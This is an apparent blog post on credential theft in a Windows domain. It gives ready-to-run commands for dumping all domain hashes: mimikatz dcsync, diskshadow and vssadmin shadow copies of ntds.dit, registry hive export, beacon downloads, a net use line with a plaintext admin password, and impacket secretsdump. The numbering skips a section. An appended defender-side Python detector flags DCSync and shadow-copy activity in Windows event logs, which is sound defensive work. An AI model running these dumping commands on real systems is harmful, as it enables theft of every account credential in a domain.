[Domain Penetration] Exporting Hashes from a Windows Domain Controller

1. Dumping all hashes in the domain with dcsync

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

2. Using diskshadow (change to the system32 directory first)

diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
delete shadows all
list shadows all
reset
exit
reg save hklm\system c:\windows\temp\system.hive

beacon> download ntds.dit

beacon> download system.hive

Pull the two files back from the domain controller to the compromised host:

net use \\192.168.75.129\c$ /user:"yiwang\Administrator" "admin123"

move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\

move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\

net use * /del /yes

Use the secretsdump.py script from impacket to decrypt them:

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt

4. Offline hash dump with vssadmin

vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive
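As an added defender-side example (not code from the original post), the following Python checks constructed Windows Security events for the two activities described above: DCSync replication requests made by non-DC accounts (Event ID 4662 carrying the replication extended-right GUIDs in section 1) and shadow-copy or ntds.dit access on the command line (Event ID 4688, sections 2 and 4). The JSON field names, the DC allow-list and the sample events are assumptions for illustration.

```python
import json

# DCSync is a replication request; with object auditing enabled Windows logs it as
# Event ID 4662 on the domain object, with these well-known extended-right GUIDs.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Constructed allow-list: the only principals expected to replicate (DC machine accounts).
KNOWN_DC_ACCOUNTS = {"DC01$"}
# Command-line fragments from the diskshadow / vssadmin workflows (needs 4688 command-line auditing).
SHADOW_MARKERS = ("diskshadow", "vssadmin create shadow", "ntds.dit", "harddiskvolumeshadowcopy")


def check_event(ev):
    """Return an alert string for one parsed event dict, or None if it looks benign."""
    eid = ev.get("EventID")
    if eid == 4662:
        props = ev.get("Properties", "").lower()
        user = ev.get("SubjectUserName", "")
        if any(g in props for g in REPLICATION_GUIDS) and user.upper() not in KNOWN_DC_ACCOUNTS:
            return f"possible DCSync: replication rights used by {user}"
    elif eid == 4688:
        cmd = ev.get("CommandLine", "")
        if any(m in cmd.lower() for m in SHADOW_MARKERS):
            return f"possible ntds.dit theft via shadow copy: {cmd}"
    return None


def scan(jsonl_text):
    """Run check_event over JSON-lines input and return the list of alerts in order."""
    events = (json.loads(line) for line in jsonl_text.splitlines() if line.strip())
    return [alert for alert in map(check_event, events) if alert]


# Constructed sample events (field names modelled on the Security log; not real captures).
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},      # normal DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},      # user account replicating
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},      # placeholder non-replication GUID
    {"EventID": 4688, "CommandLine": "vssadmin create shadow /for=c:"},
    {"EventID": 4688, "CommandLine": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy65\\windows\\NTDS\\ntds.dit c:\\windows\\temp\\ntds.dit"},
    {"EventID": 4688, "CommandLine": "notepad.exe notes.txt"},
])

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Running it reports three alerts: the user-account replication request, the vssadmin shadow creation, and the copy of ntds.dit out of the shadow copy; the DC's own replication and the notepad process stay silent.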

Reference:

https://xz.aliyun.com/t/2527#toc-1

posted @ 2019-07-25 11:16 by aoaoaoao